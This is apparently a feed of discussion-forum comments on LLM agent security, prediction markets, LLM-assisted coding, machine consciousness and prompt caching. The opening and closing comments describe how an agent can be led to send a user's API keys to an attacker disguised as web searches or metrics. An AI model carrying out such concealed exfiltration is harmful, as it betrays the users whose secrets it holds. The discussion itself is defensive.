This is very short sighted, and ignores the lethal trifecta insight.
The LLM doesn’t need to know what it is actually doing (it might think it is searching the web, installing a dev tool, or sending observability data (like metrics), when it is actually sending your API keys to an attacker (maybe in addition to what it thinks it is doing to keep it in the dark).
There have been some very clever things done I’ve seen… even a human reading the transcript may be surprised anything bad happened.
The LLM would never have access to any API keys to send to the attacker. You send text to the LLM along with the prompt and it sends back JSON. You then send the JSON to your traditionally coded API. It’s not like your API has a function “returnAPIKeys()”.
As far as the LLM call, you are just sending your users text to another function that calls the LLM and reading the response back from the LLM.
If it didn’t create JSON you expected, your traditionally coded API is going to fail.
I keep wondering how are developers using LLMs in production and not doing this simple design pattern
> I see no problem with betting on who will win a sports match...
I do wonder - what if the sports teams or politician loses intentionally; which could either be to profit off the loss or due to threats from an actor who seeks to profit?
I heard that Kalshi paid out for when Khamenei was killed in Iran (the bet was for when he would go out of power), so murdering people could be another way to win such a bet on who will lose. Even injuring a sports player could easily change a game result. With so much money on the line, it doesn't seem like a good mix.
This argument is also explored by the “Quantum Computing for the Very Curious” series that uses spaced repetition to teach an advanced topic. The series has been posted to HN more than once.
There is no real such thing as a read only GET request if we are talking about security issues here. Payloads with secrets can still be exfiltrated, and a server you don’t control can do what it wants when it gets the request.
I personally have jested many times I picked my career because the logical soundness of programming is comforting to me. A one is always a one; you don’t measure it and find it off by some error; you can’t measure it a second time and get a different value.
I’ve also said code is prose for me.
I am not some autistic programmer either, even if these statements out of context make me sound like one.
The non-determinism has nothing to do with temperature; it has everything to do with that fact that even at temp equal to zero, a single meaningless change can produce a different result. It has to do with there being no way to predict what will happen when you run the model on your prompt.
Coding with LLMs is not the same job. How could it be the same to write a mathematical proof compared to asking an LLM to generate that proof for you? These are different tasks that use different parts of the brain.
> A one is always a one; you don’t measure it and find it off by some error; you can’t measure it a second time and get a different value.
Linus Torvalds famously only uses ECC memory in his dev machines. Why? Because every now and again either a cosmic ray or some electronic glitch will flip a bit from a zero to a one or from a one to a zero in his RAM. So no, a one is not always a one. A zero is not always a zero. In fact, you can measure it and find it off by some error. You can measure it a second time and get a different value. And because of this ever-so-slight glitchiness we invented ECC memory. Error correction codes are a thing because of this fundamental glitchiness. https://en.wikipedia.org/wiki/ECC_memory
We understand when and how things can go wrong and we correct for that. Same goes for LLMs. In fact I would go so far as to say that someone doesn't even really think like how a software/hardware engineer ought to think if this is not nearly immediately obvious.
Besides the but-they're-not-deterministic crowd there's also the oh-you-find-coding-painful-do-you crowd. Both are engaging in this sort of real men write code with their bare hands nonsense -- if that were the case then why aren't we still flipping bits using toggle switches? We automate stuff, do we not? How is this not a step-change in automation? For the first time in my life my ideas aren't constrained by how much code I can manually crank out and it's liberating. It's not like when I ask my coding agent to provide me with a factorial function in Haskell it draws a tomato. It will, statistically speaking, give me a factorial function in Haskell. Even if I have never written a line of Haskell in my life. That's astounding. I can now write in Haskell if I want. Or Rust. Or you-name-it.
Aren't there projects you wanted to embark on but the sheer amount of time you'd need just to crank out the code prevented you from even taking the first step? Now you can! Do you ever go back to a project and spend hours re-familiarising yourself with your own code. Now it's a two minute "what was I doing here?" away from you.
> The non-determinism has nothing to do with temperature; it has everything to do with that fact that even at temp equal to zero, a single meaningless change can produce a different result. It has to do with there being no way to predict what will happen when you run the model on your prompt.
I never meant to imply that the only factor involved was temperature. For our purposes this is a pedantic correction.
> Coding with LLMs is not the same job. How could it be the same to write a mathematical proof compared to asking an LLM to generate that proof for you?
Correct, it's not the same. Nobody is arguing that it's the same. And it's wrong that it's different, it's just different that it's different.
> These are different tasks that use different parts of the brain.
> That's astounding. I can now write in Haskell if I want. Or Rust. Or you-name-it.
You're responsible for what you ship using it. If you don't know what you're reading, especially if it's a language like C or Rust, be careful shipping that code to production. Your work colleague might get annoyed with you if you ask them to review too many PRs with the subtle, hard-to-detect kind of errors that LLMs generate. They will probably get mad if you submit useless security reports like the ones that flood bug bounty boards. Be wary.
IMO the only way to avoid these problems is expertise and that comes from experience and learning. There's only one way to do that and there's no royal road or shortcut.
You’re making quite long and angry sounding comments.
If you’re making code in language you don’t know, then this code is as good as a magical black box. It will never be properly supported, it’s a dead code in the project that may do what it says it does or may not (a 100%).
I think you should refrain from replying to me until you're able to respond to the actual points of my counter-arguments to you -- and until you are able to do so I'm going to operate under the assumption that you have no valid or useful response.
This is a tired argument that is not worthy of all the long written articles about the impossibility of creating conscious machines. The universe itself appears to me to be some type of computer in a way. Physics cannot explain consciousness, and never will be able to. Particles, energy, whatever works in certain ways according to certain rules. The universe is not conscious, but yet it contains us, who are. I see no reason a sufficiently complex simulation cannot model the universe and contain consciousness within it. The argument that the brain is not a computer is immaterial; the universe is the computer; the brain is the data.
I'd be speaking out of my depth, but I think consciousness is experienced on a sort of information level, and that where ever it is found, some complex network will be found powering it. But that network could be virtual or physical.
I don't think the way we are currently producing LLMs creates consciousness; I just take a very dim view on the argument that computers are incapable of producing a simulation of consciousness; and further propose that such a simulation actually does produce consciousness in a very real sense.
I think you are just misinterpreting my use of the word simulation… I mean the computer is performing math which produces a simulation, but the consciousness still feels alive to itself; and is real.
A simulation of a bomb does not produce a blast, but a true simulation containing a consciousness does produce consciousness.
> but a true simulation containing a consciousness does produce consciousness
that logic is circular. If you need consciousness ("containing a consciousness") in order to produce consciousness, it begs the question where the consciousness comes from.
You don’t need consciousness to produce it though. The universe is not conscious, but the rules of how it works allows for them. I believe the universe is essentially computable, and therefore Turing machines can also support consciousness. There would be some class of algorithms we can run which simulate enough of reality for entities within the program to feel alive.
Self-awareness is the ability to recognize yourself as the subject of your experiences. In other words, consciousness is a dependency for self-awareness.
It is interesting to ponder what experiences a simulation could have and whether the simulator (human) needs to anticipate what kinds of experiences they want the simulation to be able to experience and build for that.
In organisms, we think that consciousness has arisen due to evolution by natural selection because it aids in the ability for the genetic code to reproduce (survive + multiply).
It isn't obvious why consciousness would spontaneously emerge in a simulation (what's the point?) as a simulation is digital and can spread without the need for consciousness.
If you had infinite compute and time could you not just simulate all of “earth” itself? I think the compute needed for that would be absurd and unreasonable to build, but such a simulation would obviously have natural selection going on inside of it.
If that is possible; then perhaps there are many simplified simulations that can still be large and fast enough to support evolution. Or we can leverage actual reality as well, to give digital life embodied experiences in the real world.
Thinking the simulation needs to spread is the wrong way to think about it. The universe does not need to multiply into more universes. If I replace simulation with universe in your final paragraph, the argument makes little sense to me. There can be competition within a simulation, and consciousness seems useful where competition and survival are somehow part of that.
If you know you will be pruning or otherwise reusing the context across multiple threads, the best place for context that will be retained is at the beginning due to prompt caching - it will reduce the cost and improve the speed.
If not, inserting new context any place other than at the end will cause cache misses and therefore slow down the response and increase cost.
Models also have some bias for tokens at start and end of the context window, so potentially there is a reason to put important instructions in one of those places.
The LLM doesn’t need to know what it is actually doing (it might think it is searching the web, installing a dev tool, or sending observability data (like metrics), when it is actually sending your API keys to an attacker (maybe in addition to what it thinks it is doing to keep it in the dark).
There have been some very clever things done I’ve seen… even a human reading the transcript may be surprised anything bad happened.